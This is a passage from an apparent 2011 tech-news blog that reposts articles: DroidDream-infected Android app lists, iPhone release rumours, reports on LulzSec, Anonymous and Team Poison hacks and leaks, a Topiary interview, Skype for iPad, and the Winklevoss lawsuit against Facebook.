  5. Put a malware and antivirus scanner on your phone. Although many people still think that antivirus scanners on phones are useless, maybe outbreaks such as this one will change minds. Several different big-name security companies already offer mobile-security options, many of them free. I myself had downloaded "Spider Man," which is on a bad-apps list. My Lookout software identified it as a Trojan horse.
Infected-Apps List Published by Android User 'Myournet'
  • Advanced Currency Converter
  • App Uninstaller
  • Chess
  • Dice Roller
  • Falling Ball Dodge
  • Falling Down
  • Funny Paint
  • Hilton Sex Sound
  • Hot Sexy Videos
  • Photo Editor
  • Scientific Calculator
  • Screaming Sexy Japanese Girls
  • Spider Man
  • Super Guitar Solo
  • Super History Eraser
  • Super Ringtone Maker
  • Super Sex Positions
Infected-Apps List Published by Android User 'Kingmall2010'

Advanced App to SD
Advanced Barcode Scanner
Advanced Compass Leveler
Advanced File Manager
Best password safe
Bowling Time
Magic Strobe Light
Music Box
Sexy Girls: Japanese
Sexy Legs
Super Stopwatch & Timer
Supre Bluetooth Transfer
Task Killer Pro

Infected-Apps List Compiled Under the Developer Name 'we20090202'
  • Advanced Sound Manager
  • Basketball Shot Now
  • Bubble Shoot
  • Color Blindness Test
  • Finger Race
  • Funny Face
  • Magic Hypnotic Spiral
  • Omok Five in a Row
  • Piano
  • Quick Delete Contacts
  • Quick Notes
  • Super Sexy Ringtones
  • Tie a Tie
Also on the lists are the foreign-language apps shown at left.

infected-apps-5149841.jpg
Lookout Mobile Security, which provides security software for mobile phones, posted on its blog a list of 56 Android applications that have been infected with DroidDream, a new type of Android malware that roots your phone and gains access to as much personal information as it can. The apps also can open a backdoor, allowing more executable code to download to your phone without your being aware of it.

A few of these apps have already been downloaded by at least 50,000 users, making this one of the most widespread cases of Android malware to date. Although the apps in question have been pulled from the Android Market, Google is investigating them and has not yet moved to wipe them remotely from users' phones.

Lookout has issued an update to its mobile security software. If you have downloaded any of these apps, the company advises that you run its malware scanner and e-mail the Lookout support center. Mashable (also posted a list of infected apps complied by Myournet) suggests returning your phone to your carrier, as your data and security may be compromised.

With more and more malware emerging for the Android platform every day, users would do well to be careful and pay strict attention to what happens on their phones. You have to remember that smartphones are essentially computers--and all computers are vulnerable to attack by malicious software.

Credit: PC World

Report: Analysts Sees Apple Releasing two iPhones for Late September

iphone-5.png
For much of the spring, the reporters who cover Apple (AAPL) have been arguing among themselves about what to call the new iPhone they expect the company to introduce in September.

Some call it the iPhone 5, to match the iOS 5 operating system Apple unveiled to developers three weeks ago.

Some, anticipating that the new device will be a speeded-up iPhone 4 rather than a major re-design, have been calling it the iPhone 4S, echoing the nomenclature Apple used two years ago when it introduced the iPhone 3GS.

In a note issued early Monday, Deutsche Bank's Chris Whitmore is telling clients to expect both -- an iPhone 5 and an iPhone 4S.
"With Nokia and RIMM struggling," he writes, "the time is right for Apple to aggressively penetrate the mid range smart-phone market (i.e. $300-500 category) to dramatically expand its [total addressable market] and market share."
As Whitmore sees it, an iPhone 4S that is unlocked, priced around $349, and comes with a pre-paid voice plan would "drive significantly greater penetration" into an addressable market that has grown to include 1.5 billion potential customers in 98 countries, two thirds of whom prefer pre-paid plans.

In the U.S., most cellphones are subsidized by carriers with contracts that allow them to recoup the cost of the phone in monthly payments. But as the above chart shows, there are large swaths of the world -- especially in Africa, Asia and Latin America, where iPhone penetration is low -- where customers prefer to pay the full cost of the phone upfront.

Note that analysts for some time have been calling for Apple to release a lower cost, pre-paid iPhone, and that Whitmore does not cite any sources or claim any inside knowledge for his two-iPhone theory.

[The Loop's Jim Dalrymple, however, recalls that COO Tim Cook told Bernstein's Toni Sacconaghi earlier this year that Apple "understood price is big factor in the prepaid market," and though the pre-paid market may seem out of Apple's realm, Cook said that the company was "not ceding any market."]

In a separate note issued Sunday, Morgan Stanley's Katy Huberty, back from a week of meetings in Taiwan, reports that she expects iPhone and iPad production to "begin ramping up aggressively" from August through the end of the year.

If production for what Huberty sees as one new iPhone doesn't start until in mid to late August, the launch might not come until late September. In her unit sales spreadsheet, copied below, she's shifted 2 million iPhones from calendar Q3 to calendar Q4 (Apple's fiscal Q4 and Q1 2012). If the launch comes in early September, she says, she'll shift them back.
screen-shot-2011-06-27-at-6-47-41-am.png

Anonymous Taking Charge As Lulzsec Rolls Out

Lulzsec-hackers.jpg
Hacking season is not over yet. Even though LulzSec, the group of hackers who made a name for themselves by hacking Sony, Nintendo, and PBS among others, called it quits on Saturday, another group wants to pick up the slack.

After announcing the end of its activities, Lulzsec encouraged its 281,870 Twitter followers to follow the account of Anonymous, another hacking organization,  which on Monday published new materials on counter-hacking tools and addresses of U.S. FBI locations. Anonymous also picked up more than 60,000 Twitter followers over the past 24 hours.

Acknowledging LulzSec's retirement, the group released a torrent file containing all the data it obtained over the past seven weeks, including data from prominent targets such as the CIA, U.S. Senate, Sony, and AOL.

Even though LulzSec has been active for only 50 days, the hacking group garnered a significant amount of media attention: "For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could," the group says in a goodbye note.
anonymous_logo

Anonymous is the hacking group that was alleged (but denied any involvement) to be behind the massive Sony PlayStation Service hack earlier this year.

The files Anonymous released Monday include documents and hacking and counter-hacking tools. The data weighs in at 625MB and its exact source is not mentioned, except a link to the CDI Sentinel program page, which provides free cybersecurity training using a mobile computer lab.

Lulzsec Hacking Group Just Announced that it's finished

Written By Unknown on Sunday 26 June 2011 | 10:37

Lulzsec-hackers.jpg
The problem for groups shrouding themselves in anonymity is that they can never truly gauge the public or press response to their actions.

Just as it was with Wikileaks and Anonymous, and the impact that 4chan and its crucial elements of anonymity have had on memes and popular culture, these viral constructs are unpredictable, difficult to manage and ultimately, all but impossible to maintain.

What is clear, however, that the supposed six that are mentioned in their press release as being the ones behind the subversive group have called it a day.

In a statement via its official Twitter feed this evening:
“Again, behind the mask, behind the insanity and mayhem, we truly believe in the AntiSec movement. We believe in it so strongly that we brought it back, much to the dismay of those looking for more anarchic lulz. We hope, wish, even beg, that the movement manifests itself into a revolution that can continue on without us.
The support we’ve gathered for it in such a short space of time is truly overwhelming, and not to mention humbling. Please don’t stop. Together, united, we can stomp down our common oppressors and imbue ourselves with the power and freedom we deserve.”
After delving into the latest release, around three quarters of a million usernames and passwords across a number of different sites have been hacked, collected and now disseminated to thousands of other users. These login accounts include details of the Battlefield Heroes game, as well as for the website Hackforums.net.

More usernames and passwords relate to the NATO Bookshop, for which the URL of the page now simply redirects to the NATO homepage. It is unclear whether these accounts relate to NATO operations or internal network access.

A screenshot appears to show evidence that a Navy website was hacked into and text replaced with LulzSec slogans. The user appears to be using Ubuntu Linux. Whether this makes a difference or not is unclear at this stage.

Also in this vast cache of data appear to be internal AT&T files, relating to its 4G LTE roll-out, as well as details of just over 90,000 IBM personal phones.

It does not appear any customer data from AT&T has been compromised.

Looking further into the cache, there are IP addresses for organisations such as Disney, EMI and Universal.

No doubt, many may feel cheated in this release. Without the shock and awe of previous torrented caches of hacked data, this release also includes a vast list of IP addresses with simple credentials of “root” and “password”. It also includes AOL related data, which will mean little to so many.

There are, however, a few theories as to why they disbanded today.

Fifty days is a set milestone and they knew it from the start. Today is the birthday of George Orwell, who died in 1950, which may or may not be coincidental. However, considering the person running the Twitter feed, known as Topiary, is British and lives within the United Kingdom — based not only on the writing style and the references to time zones — it’s unlikely that this is the case. It’s now the 26th and the releases came at midnight.

Their identities have been compromised after a series of embarrassing confrontations between white hat versus black hat hackers. The spat has continued between the Jester and LulzSec after the Jester took down their website, along with other Pastebin posts which purport the names of key members of the hacktivist network. Plus, one alleged member of LulzSec, Ryan Cleary, is still in custody in England after his part in the hack on SOCA which means governments are hot on their tales.

They got bored and along with disorganisation, lacking expectations in media coverage, or a slow-down in Twitter followers as a way of gauging reaction that may have put them off their activities. It’s possible that this is the case, but something just seems amiss about their recent activities. The Arizona police department leaks alone were far more damaging — seemingly at least — than the final cache released this evening.

The motions have already been put in place and it is for us, the general population, to take the reigns of #AntiSec into our own hands and revolt against our governments. Considering so many of us voted in our respective governments, it’s unlikely that will happen.

What is interesting, however, is whether this will result in a domino effect in other parts of the world.

With revolutions fully in swing across North Africa and the Middle East, if LulzSec is trying to replicate the anti-government feeling across other parts of the world, this will most likely not succeed.

Unlike with Wikileaks, the diplomatic cables releases ‘legitimised’ the protests and ultimately the revolutions that occurred, by implicating nation states of wrongdoing by other, more democratic nations.

Whether the world can now breathe a sigh of relief, knowing that the group have disbanded — at least publicly, it seems — there is no doubt a group willing to perform very much the same functions, under a different name and a unique ideology.

Hackers exposes former British PM Tony Blair data

Written By Unknown on Saturday 25 June 2011 | 07:47

TonyBlairHack_270x169.png
Hackers today released what looks like personal information on former British Prime Minister Tony Blair, including the contents of his electronic address book, with contact data for members of Parliament and for what could be Blair's dentist and his mechanic.

The group, Team Poison, claims to have accessed the Blair office's webmail server "via a private exploit" in December of last year. (Though the group said seperately that they've had the information "for 1 year now.") In the document, which was put up on Pastebin around 6:30 p.m. ET on Friday, the hackers claim that they "still have access to the webmail server, [sic] phone numbers may have changed but all the information is legit."

tony-blair.jpg

According to the Team Poison Twitter (manned by a hacker called "Trick"), the motive seems to be political — Blair is described as a "war criminal," and Trick seems to imply that those whose information is being released "supported the war in iraq." (How Team Poison knows that Blair's dentist, whose address and phone number appear in the file, was pro-war, is unclear.)

Meanwhile, hacker group LulzSec, which has claimed credit for hacks on Sony, the CIA, the U.S. Senate, and, last night, the Arizona Department of Public Safety, promised in a tweet today that it would be "releasing more goods on Monday!"

LulzSec and TeaMp0isoN have been in a public spat, claiming to have attacked each other's servers and threatening to expose rival members. On Wednesday, someone released information purportedly exposing the identity of a key member of LulzSec who goes by the nickname "Sabu."

TeaMp0isoN was described in a FoxNews.com article yesterday as a group of professional hackers linked to the Palestinian-friendly "Mujahideen Hacking Unit" that defaced Facebook in December. "We're here to show the world that (LulzSec are) nothing but a bunch of script kiddies," Hex0010, a 23-year-old member of TeaMp0isoN, told the Web site, using a derogatory phrase for inept hackers.

The attacks are just the latest in a recent wave of incidents that have left many Web sites defaced, much customer data exposed, and much corporate and government data leaked.

Earlier today, PBS.org, which was defaced in May by LulzSec, was targeted again by "Warv0x (AKA Kaihoe)," according to a Pastebin file. "This wasn't done for fame or fun, just proving LulzSec aren't as good as they think they are," the hacker said in a note on The Hacker News. "I haven't rooted the box or been up to crack the hashes, I'm just proving that most of their attacks are very lame and basic (i'm pretty sure and automated) SQL injections and further privilege escalation, which is just a matter of time."

A PBS.org spokeswoman confirmed to CNET in an e-mail that the site was hacked. "What we have seen is that one area of one Web site--the portraits area of the Web site Becoming American, was defaced," said Jan McNamara of PBS.org. "A very small number of PBS administrator usernames and encrypted passwords were exposed."

Also today, the Guardian released Internet Relay Chat logs that the newspaper said were leaked from a private LulzSec chat room. In the logs, Sabu warns others to be careful who they talk to about the group's activities. "You realize we smacked the FBI today," Sabu says in the logs. "This means everyone in here must remain extremely secure."

In those logs, there are a few brief references to "Ryan," but it's unclear what Ryan's role is or whether he's the same person as the 19-year-old Ryan Cleary who was arrested earlier this week in Essex, England, on computer charges. Cleary was charged Wednesday in connection with a series of distributed denial-of-service attacks, including one earlier this week on the Serious Organized Crime Agency in the U.K. that was organized by LulzSec and the Anonymous group as part of a campaign to target government and financial organizations.

LulzSec had said that Cleary operated one of the group's chat rooms on his IRC server but that he was not a key member of the group.

A hearing in the case was reportedly scheduled for Saturday morning.

A Leader of Lulzsec Speaks: Worrying is For Fools

lulzsec-leader.jpg
He's part of a group that claims to be behind the recent hack attacks against the CIA, U.S. Senate, Sony, Fox, and PBS. If caught, he could face years in prison. But when we chatted with a member of the notorious hacking collective Lulz Security last night, he said he's not worried about a thing.

On Tuesday, headlines blared that the "mastermind" behind the hacking group Lulz Security (or LulzSec for short) had been arrested in England, a 19-year-old named Ryan Cleary. Many assume that with Cleary behind bars and cooperating with police, it's only a matter of time before the rest of the members of the world's most-wanted hacking group fall, too.

But in a Skype chat last night, a leading member of Lulz Security who goes by the alias "Topiary" says his group—whose core is composed of just a handful of hackers—feels no more threatened than when they burst onto the scene in May with hacks of Fox.com and PBS.

Since May, LulzSec has embarked on a stunning spree of public hacks. They hacked PBS in revenge for an unflattering Wikileaks documentary, attacked an FBI-affiliated non-profit, took down the websites of the CIA and British law enforcement, boasting of their exploits on their popular Twitter feed. They stole and leaked information from corporations like Sony in an effort, they say, to expose poor online security.

But LulzSec also leaked the usernames and passwords of 62,000 random people earlier this month. After the leak, LulzSec gleefully reveled in the havoc their fans were wreaking on Amazon and Facebook accounts using the stolen information. When we asked why LulzSec was attacking innocent internet users, Topiary claimed LulzSec had nothing to do with it.

"We didn't touch them. The Twitter horde did," he said, referring to LulzSec's more than 250,000 Twitter followers. Topiary probably felt no need to justify LulzSec's actions because to him, it's all for laughs.

"LulzSec is the expression of energy through comically malicious and entertaining cybermaterials," he said.

Of course authorities don't find LulzSec very amusing, and the FBI is actively hunting LulzSec. But even the arrest of Ryan Cleary in England hasn't put a damper on their fun, according to Topiary.

"What's changed? Ryan isn't part of LulzSec… No LulzSec arrests have been made. Our Twitter hasn't even been suspended," he said.

According to Topiary, media reports have vastly exaggerated Ryan Cleary's connection to LulzSec. "The mass media are clueless and have spun 'LulzSec leader' out of their own asses, when there are no facts to support that Ryan is related to LulzSec," he said.

Topiary points to the charges against Cleary, which include a number of hack attacks that occurred in late 2010, long before Lulz Security existed. However, Cleary is also charged with bringing down the website of the British Serious Organised Crime Agency (SOCA) on June 20th, the same day Lulz Security claimed to have taken it down. Lulz has said on its Twitter that, "maybe he hit SOCA after we did?" It was suspiciously down after we let it up."

Cleary's only connection to LulzSec, Topiary claims, was that he ran a chat server that hosted a public LulzSec "fan room" where supporters could gather. "We had identical fan chats on 2600, AnonOps, Efnet, Rizon, Unreal, etc…" Topiary says, listing off other chat networks.

Threats to LulzSec don't just come from authorities. Rival hackers with names like "Th3j35t3r," "Team P0ison" and "Web Ninjas" have been engaged in increasingly frenzied attempts to identify LulzSec members. LulzSec often responds viciously to people who claim to have identified them, which in turn makes LulzSec's antagonists certain they're right. We asked Topiary why, if these groups really aren't onto anything, LulzSec protests so much.

"They are lonely people that are programmed to feel that they need an enemy at all times," Topiary said. "If we're out of their lives, they don't have much going for them."

LulzSec better be as secure as Topiary thinks it is, because they are embarking on their biggest hack yet. Their latest operation, called "Antisec," is targeting  government agencies and banks with the specific goal of stealing secret documents and leaking them. The first leak will supposedly be released Friday, but Topiary declined to give us a preview.

"As an arrogant and violent sociopath driven to a frenzy by the sense of my own power, I can't divulge the upcoming releases," he said.

After all this bluster, Topiary was asked if he wasn't worried at all about being caught. His response: "Worrying is for fools!"

Source: Gawker

Skype for iPad Coming Soon

skypeforipad.jpg

After plenty of success with the iPhone version of the Skype app, the company is finally releasing an official version for the iPad. Skype hasn't announced a date for release yet, but video of the app has leaked out online, and the app is expected to be approved soon. Skype VP of Consumer and Product Design Rick Osterloh said that the iPhone version of Skype burst out of the gate quickly, with a big launch and "a userbase that doubled in just a month's time." And he said the iPad version should "have a similar success," especially since it's basically the same in functionality: chatting, audio and video calling, and all of the other standard actions you can expect from Skype. The current app has been in testing for a few months now, and Osterloh is excited to unleash it on the public.
skypeforipad2.jpg

A few features in the full PC/Mac app didn't make it in, Osterloh says, perhaps most notably the ability to do file sharing. But that's obviously just because of the way the iPad deals with files. While the company was fine with simply having an iPhone app that was iPad compatible during the first release of the iPad, the camera in the iPad 2 was what made this app "super compelling."

When asked if Skype had ever butted heads with Apple over duplicating functionality on the iPhone in terms of FaceTime or simple audio calling, and he said no -- "they've been super supportive," and that Skype was invited onstage with Apple during the reveal of iOS 4.0. When also asked about a possible Twitter-style deal, where Skype might be included in the OS itself, and Osteroh said there weren't any plans for that yet, but "in general, we're always interested in deeper integration."

Skype for iPad shouldn't be too surprising a release -- ever since the iPad got a camera on it, it was likely that we'd see some version built especially for the bigger tablet. But according to Osteroh, it's a solid release for the company, and yet another step out onto mobile devices for one of the premiere communication networks online. We'll let you know as soon as we see the app live in the App Store -- it shouldn't be too long.

Winklevoss Twins Sue Facebook In Boston Court

Written By Unknown on Friday 24 June 2011 | 11:00

facebook-logo.png

(Reuters) - Olympic rowing twins Cameron and Tyler Winklevoss are pushing ahead with another suit against Facebook, a day after they decided not to appeal a U.S. Supreme Court ruling upholding their $65 million settlement with Facebook and its founder Mark Zuckerberg.

In a status report filed on Thursday with the U.S. District Court of Massachusetts, the twins and their business partner, Divya Narendra, said they would move the court for discovery on whether Facebook "intentionally or inadvertently suppressed evidence" during settlement proceedings over claims that Zuckerberg stole their idea for a college social networking website.

The claim in the Massachusetts Court relates to documents and communications that would have thrown light on the exact relationship between the twins and Zuckerberg at the time of Facebook's founding and says that Facebook should have disclosed those documents during the original settlement discussions.

REUTERS-LOGO.jpg
The original settlement was intended to resolve a feud over whether Zuckerberg stole the idea for what became the world's most popular social networking website from the Winklevosses, who like him had attended Harvard University. Their battle was dramatized in the 2010 film "The Social Network.

After agreeing to the cash-and-stock accord, the Winklevosses sought to undo it, saying it was fraudulent because Facebook hid information from them, and that they deserved more money.


winklevoss twins.jpg

Tyler Meade, counsel for the Winklevoss twins and Narendra, declined to comment.

In a statement, Facebook's outside counsel Neel Chatterjee said, "These are old and baseless allegations that have been considered and rejected previously by the courts."

Copyright 2011 Thomson Reuters. Click for Restrictions
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Turorial Grapich Design and Blog Design - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger